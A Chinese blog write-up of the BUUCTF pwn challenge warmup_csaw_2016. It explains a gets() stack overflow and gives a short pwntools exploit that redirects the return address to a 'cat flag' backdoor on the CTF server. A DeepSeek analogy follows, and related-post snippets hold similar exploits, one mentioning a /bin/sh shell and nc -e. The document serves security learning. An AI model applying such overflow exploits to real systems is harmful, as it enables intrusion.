PWN入门之BuuCTF warmup_csaw_20161

已于 2025-02-24 18:56:59 修改
阅读量319 收藏 5
点赞数 5
CC 4.0 BY-SA版权
文章标签: c语言
于 2025-02-24 17:03:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2402_87396272/article/details/145832209

 首先,观察题目并下载相关文件。

将文件拖入PE分析工具中,发现其为64位程序,

随后在IDA64中打开文件并发现存在gets函数调用,这通常意味着程序可能存在栈溢出漏洞。

接着,定位到main函数进行反编译,发现其中包含字符串“cat flag”,这提示了我们可能需要执行一个命令来获取flag。

再查看v5的位置,发现离返回地址的距离是0x40 + 8。接下来,检查v5的内存位置,发现它与返回地址之间的偏移量为0x40 + 8。

最后,根据这个信息构造漏洞利用代码(exp),成功获取flag。

from pwn import *
p = remote('node5.buuoj.cn',26331)
payload = b'a' * 72 + p64(0x40060d)
p.sendline(payload)
p.interactive()

另外再附加一点小感想:

这是我做的第一道pwn的题目,但实则我在去年就接触二进制了,不得不说pwn相对逆向来说要难理解,但是最近deepseek大热,我也跟风问了deepseek一个问题,让他用类比的方法为我讲解pwn的原理,它是这样回我的:

场景:厨房的盘子架

想象你有一个专门用来临时存放盘子的架子()。它的规则是:

  1. 后进先出:每次洗好的盘子(函数调用)会叠在最上面,用的时候从最上面拿。

  2. 固定高度:架子只能放 10 个盘子(栈的固定内存空间)。

  3. 标签功能:每叠一个盘子,服务员会在盘子边缘贴一张便利贴(返回地址),记录“这个盘子用完要放回哪里”(比如“主厨的桌子”)。

正常流程

  1. 叠盘子:每洗一个盘子(函数执行),就叠在架子上。

  2. 用盘子:当需要取盘子时(函数返回),从最上面拿,并查看便利贴(返回地址)把它送回正确的位置。

栈溢出攻击:恶意操作

假设一个坏人(攻击者)故意洗了 15 个盘子,强行叠到架子上:

  1. 超出容量:架子只能放 10 个盘子,但坏人硬塞了 15 个。

  2. 覆盖便利贴:第 11~15 个盘子压坏了原本贴在架子上的便利贴(覆盖返回地址)。

  3. 篡改指令:坏人在第 11 个盘子偷偷贴上自己的便利贴,写着“送到后门垃圾桶”(恶意代码地址)。

结果

当厨房按规则取盘子时:

  • 看到最顶层的便利贴是“送到后门垃圾桶”,于是真的把盘子(程序控制权)送到了那里。

  • 坏人就能从垃圾桶里拿到盘子(执行恶意代码),比如偷走食物或搞破坏。

关键点

  • 容量限制:栈的大小固定,但程序可能忘记检查输入数据的长度(比如用户输入超出预期)。

  • 后进先出结构:溢出的数据会从栈顶“倒灌”,覆盖关键信息(如返回地址)。

  • 恶意利用:攻击者通过溢出数据,将返回地址篡改为自己设计的恶意地址。

下次看到“栈溢出”,就想象一个被恶意塞爆的盘子架,便利贴被偷偷改掉的样子吧! 🍽️💥

我觉得讲的很好在此也分享一下

冬令时-G
关注
BUUCTF|warmup_csaw_2016 1
cm_zl
04-30 1372
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28247") payload = "A"*(0x48) + p64(0x40060D) io.sendline(payload) io.interactive()
CSAW CTF 2016 mfw Writeup
weixin_43622501的博客
03-31 1260
CSAW CTF 2016 mfw Writeup 0x01 需要知道的## 本地文件包含 git源码泄露 0x02 本地文件包含 来自维基百科的解释: In PHP the main cause is due to the use of unvalidated user-input with a filesystem function that includes a file for exe...
buuctfwarmup_csaw_2016
weixin_54452942的博客
03-25 571
发现了一个gets函数可以溢出,并且在上面的运行中,我们看到他输出了一个地址,在下面的sprintf函数中将一个函数的地址输出了,我们去看看这个函数是干什么的。一种是ida直接看(不一定准),40h是64字节,再加8字节的rbp就是ret的位置。这里的返回地址,也就是rbp下面的地址是df28,我们输入的‘aaaaa’在dee0。是一个没有保护机制的64位x86架构的小端可执行程序。断在main函数地址,或者调用gets函数的地址也行。减一下刚好和ida中的一样。两种方式获得填充数据大小。
buuctf web warmup详细题解
weixin_64160292的博客
03-31 3488
题目:warmup 题目来源:buuctf 分析过程: 1. 首先ctrl + u 查看源代码,我们发现有一个source.php文件 2. 我们打开source.php文件,是一段代码,这道题要我们代码审计。 3. 与source文件相似的hint.php文件我们也打开看一下,它说flag在ffffllllaaaagggg中。 正在上传… 4. 然后回来source.php看这段代码,通过上网查询关于php的函数的用法。然后审计代码得出,...
buuctf|warmup_csaw_2016 1
m0_64236521的博客
04-15 1718
buuctf|warmup_csaw_2016 1 下载文件运行如下 checksec查看下保护 file一下,是64位文件 拉进ida,发现gets(v5),查看v5,明显的栈溢出 找到system,地址40060d 直接exp from pwn import* p=remote('node4.buuoj.cn',28415) payload=b'A'*0x48+p64(0x40060D) p.sendline(payload) p.interactive() 得flag ...
BUUCTF - PWNwarmup_csaw_2016
古月浪子的博客
03-19 3378
checksec一下,发现啥保护也没开 IDA打开看看,又是明显的栈溢出漏洞,看到v5的长度为0x40、后门函数的地址为0x40060d from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.s...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 420
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF_PWN_test_your_nc详细题解
qq_46238551的博客
10-20 3358
test_your_nc_1 IDA PRO查看主函数 发现system("/bin/sh"),从主函数进入则执行getshell,所以直接nc或者写一个交互程序都可以getshell。 gdb动态分析,b main下主函数断点,r运行,看一下跳转到system函数后具体的执行过程 n单步执行,将程序调整到运行system函数之前 n单步执行,运行system(“/bin/sh”),观察getshell 本地gdb调试成功后,运行exp拿到flag exp.py ``..
BUUCTF刷题之路-warmup_csaw_20161
qq_30528603的博客
05-27 476
大概明确函数的执行流程。而且我们在主函数一眼就看到一个危险函数gets,大概率就是个栈溢出。然后我们又在IDA中发现有system和一个后门函数,那这题就非常简单,跟上一题是一个思路的。那我们就直接栈溢出覆盖返回地址到后门函数,这题就做完了。在主函数中我们看到v5变量离rbp距离是0x40h,因为是64位程序还得加8才到返回地址。这题原本昨天就打算发的,刚做完电脑死机了。
BUUCTF warmup_csaw_2016 1
qq_56313338的博客
09-10 392
简单的栈溢出
[BUUCTF-pwn]——warmup_csaw_2016
Y_peak的博客
01-30 5456
BUUCTF——warmup_csaw_2016 题目地址:https://buuoj.cn/challenges 题目: 管他三七二十一,先将文件下载下来再说。老规矩,现在Linux上用checksec看看文件。64位,Stack、NX、PIE都没有开,应该是栈溢出的题。 赶快 go go go 去window 上用IDA反汇编看看,看到返回的是gets函数,一个典型的可以利用栈溢出覆盖的地方。其他没什么有用的信息。 按Shift + F12,看一下字符串。不看不知道一看有惊喜。cat flag.
warmup_csaw_2016 1
weixin_52034946的博客
01-13 922
先checksec 是64位,小端序 进入ida,查看字符串 有一个cat flag 的字符串,跟进去,是这个函数,也就是执行这个函数我们就可以得到flag 一如既往的来到了main 函数处, 也是看到了get函数,一般就是栈溢出了,v5的大小位0x40,再加上是64位,所以要输入0x40+8,来造成栈溢出 脚本 from pwn import* r=remote(‘node3.buuoj.cn’,28011) flag_addr = 0x40060D payload = ‘a’*(0x40+8)+p6
pwn-3-warmup_csaw_20161
zhi741的博客
10-12 498
然后在kali里面写入我们构建的playlaod的值,vim 1 这里是我构建playlaod的文件 0,然后用python 1 执行脚本,这里不用输出ls查询,但是直接将flag值给栈溢出出来了 复制flag值进行下一道题吧~~~出现了下面这张图片,看着是不是很熟悉呢,这个就是我们最后站一处后到达的地址,在这里进行命令执行操作,这个时候是不是我们就可以书写一般的playlaod了呢?找到这个时候我们就需要看系统程序了,我们已经知道了目的地,我们还需要知道怎么走,我们开始看main函数。
warmup_csaw_2016 1(栈溢出)
最新发布
Snk0xHeart的博客
04-07 380
扔进虚拟机checksec64位,没开栈保护扔进IDA(64位),找到main,F5反编译跟上一题差不多,其他没啥作用然后我们看到sprintf 函数,它和gets函数差不多,都可以导致栈溢出但sprintf 函数在我们输入的末尾添加换行符 \n了,无法造成栈溢出,也就是我们无法利用sprintf 函数进行栈溢出,只能利用gets函数(sprintf 函数不会检查目标缓冲区 str 的大小,如果格式化后的字符串长度超过了缓冲区的大小,就会导致缓冲区溢出)
BUUCTFwarmup_csaw_2016
2201_75556700的博客
11-29 539
4、这里有两个数组都是64字节,在sprintf这里,将sub_40060D函数的地址存放在s中。题目一:【BUUCTFwarmup_csaw_2016。3、使用ida64分析文件,找到main函数,F5反汇编。2、下载附件,在kali中分析,64位,小端存储。5、查看函数sub_40060D,地址。03、权限不够时,添加权限就可以。04、使用r命令运行程序。05、使用n命令单步调试。01、使用gdb工具。
buuctf pwn [rip] [warmup_csaw_2016 1] [ciscn_2019_n_1 1]
m0_62142241的博客
02-27 558
栈溢出 【以下这几题全是利用栈溢出来进行攻破】 相同步骤: 1.下载文件 2.启动靶机 3.打开Terminal(用nc打开端口,用ls打开目录及文件) 【nc的参数用法 -d 后台模式 -e prog 程序重定向,一旦连接,就执行 [危险!!] -g gateway source-routing hop point[s], up to 8 -G num source-routing pointer: 4, 8, 12, … -h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1470
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
PWN——warmup_csaw_20161——简单栈溢出
2301_80905479的博客
12-03 197
先看main函数,还是get导致的栈溢出。那个cat flag.txt 在。有0x40+0x8个。
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 456
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
buuctf pwn others_shellcode
02-25
### BUUCTF Pwn Others_shellcode 解题思路 #### 题目概述 此题目属于PWN类别中的shellcode编写挑战。目标是在给定环境中执行任意代码,通常通过构造特定的机器码来实现这一目的[^1]。 #### 环境准备 为了成功完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值